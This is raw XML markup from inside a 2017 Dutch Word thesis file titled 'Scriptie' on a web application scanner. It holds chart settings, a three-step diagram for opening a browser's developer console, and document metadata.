          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:shape val="box"/>
        <c:axId val="1753361840"/>
        <c:axId val="1753364160"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="175336184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753364160"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1753364160"/>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753361840"/>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3CB45B-22B3-4369-9894-BA1491AF4593}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nl-NL"/>
            <a:t>Rechtermuisknop</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CBD0EC4-FE41-4F96-86BB-9ACCAC93472B}" type="parTrans" cxnId="{08B75AC8-2C2A-46B2-AA79-00F5ACC579D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nl-NL"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{780BF0A7-5FBA-41D8-9DAF-BF717CF215EE}" type="sibTrans" cxnId="{08B75AC8-2C2A-46B2-AA79-00F5ACC579D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nl-NL"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5985C6E8-CE07-4672-9F3F-D84B153659FD}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nl-NL"/>
            <a:t>Inspecteren</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45831D98-84E6-4DC2-AC77-4CAD6AE17C84}" type="parTrans" cxnId="{C20A21EA-8CB3-4B05-AC59-822E9E45A3C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nl-NL"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEC44561-81CF-4860-A92D-99F69B008B8F}" type="sibTrans" cxnId="{C20A21EA-8CB3-4B05-AC59-822E9E45A3C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nl-NL"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6A8E34B-1349-4F6B-8319-F3472407ED06}">
      <dgm:prSet phldrT="[Tekst]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="nl-NL"/>
            <a:t>[Tab] Console</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DF4B612-8DCD-4FAF-BB73-4B8116764DB3}" type="parTrans" cxnId="{2D54836B-90A6-426C-9185-1E5CB622D204}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nl-NL"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26FD237D-4269-4B7D-8B94-D23195A54B14}" type="sibTrans" cxnId="{2D54836B-90A6-426C-9185-1E5CB622D204}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="nl-NL"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" type="pres">
      <dgm:prSet presAssocID="{C03CB45B-22B3-4369-9894-BA1491AF4593}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" type="pres">
      <dgm:prSet presAssocID="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF9F7A04-B148-4E67-A36A-8C8F217049A2}" type="pres">
      <dgm:prSet presAssocID="{780BF0A7-5FBA-41D8-9DAF-BF717CF215EE}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" type="pres">
      <dgm:prSet presAssocID="{5985C6E8-CE07-4672-9F3F-D84B153659FD}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E7F1419-364D-4B07-94AE-24C73C49376B}" type="pres">
      <dgm:prSet presAssocID="{DEC44561-81CF-4860-A92D-99F69B008B8F}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BD701D1-071C-477D-9027-56FD635BB722}" type="pres">
      <dgm:prSet presAssocID="{C6A8E34B-1349-4F6B-8319-F3472407ED06}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{807F842C-ECEB-6941-9D13-9AE05C05D9D6}" type="presOf" srcId="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{3C1ADDAF-435A-BA42-9ABC-6CAB8CD710B7}" type="presOf" srcId="{C03CB45B-22B3-4369-9894-BA1491AF4593}" destId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{08B75AC8-2C2A-46B2-AA79-00F5ACC579D5}" srcId="{C03CB45B-22B3-4369-9894-BA1491AF4593}" destId="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}" srcOrd="0" destOrd="0" parTransId="{8CBD0EC4-FE41-4F96-86BB-9ACCAC93472B}" sibTransId="{780BF0A7-5FBA-41D8-9DAF-BF717CF215EE}"/>
    <dgm:cxn modelId="{2D54836B-90A6-426C-9185-1E5CB622D204}" srcId="{C03CB45B-22B3-4369-9894-BA1491AF4593}" destId="{C6A8E34B-1349-4F6B-8319-F3472407ED06}" srcOrd="2" destOrd="0" parTransId="{5DF4B612-8DCD-4FAF-BB73-4B8116764DB3}" sibTransId="{26FD237D-4269-4B7D-8B94-D23195A54B14}"/>
    <dgm:cxn modelId="{1DD89FC3-4BF0-874B-A648-CF26632F19DC}" type="presOf" srcId="{5985C6E8-CE07-4672-9F3F-D84B153659FD}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{13AB6160-FC3E-5649-909E-214CF8EF5699}" type="presOf" srcId="{C6A8E34B-1349-4F6B-8319-F3472407ED06}" destId="{6BD701D1-071C-477D-9027-56FD635BB722}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{C20A21EA-8CB3-4B05-AC59-822E9E45A3C7}" srcId="{C03CB45B-22B3-4369-9894-BA1491AF4593}" destId="{5985C6E8-CE07-4672-9F3F-D84B153659FD}" srcOrd="1" destOrd="0" parTransId="{45831D98-84E6-4DC2-AC77-4CAD6AE17C84}" sibTransId="{DEC44561-81CF-4860-A92D-99F69B008B8F}"/>
    <dgm:cxn modelId="{087E2537-E6D6-EC48-8F63-C711540319B4}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{06A8121F-7746-DF4D-A30C-91A8C7E6B641}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{BF9F7A04-B148-4E67-A36A-8C8F217049A2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{1F270194-88C0-B140-8832-D2B9A4029F10}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{531C3B1F-1838-A440-A43A-B13CA43B3B7C}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{8E7F1419-364D-4B07-94AE-24C73C49376B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{C2E6F0FC-7C6C-B14D-B58E-5E7EF08C2704}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{6BD701D1-071C-477D-9027-56FD635BB722}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron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B109A5-F6BB-43FA-9F60-1BB393259A2B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="114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Rechtermuisknop</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="280974" y="88474"/>
        <a:ext cx="839476" cy="559651"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1260363"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Inspecteren</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1540189" y="88474"/>
        <a:ext cx="839476" cy="559651"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BD701D1-071C-477D-9027-56FD635BB722}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="251957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[Tab] Console</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2799404" y="88474"/>
        <a:ext cx="839476" cy="55965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342DFF-A59E-E049-85A0-5B7B851C4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1481</TotalTime>
  <Pages>108</Pages>
  <Words>25438</Words>
  <Characters>145001</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1208</Lines>
  <Paragraphs>340</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Scriptie</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>500695364</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>170099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Scriptie</dc:title>
  <dc:subject>Webapplicatie Scanner</dc:subject>
  <dc:creator>Mohamed El Kawakibi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>1512</cp:revision>
  <cp:lastPrinted>2017-08-14T12:34:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-14T12:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-20T21:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>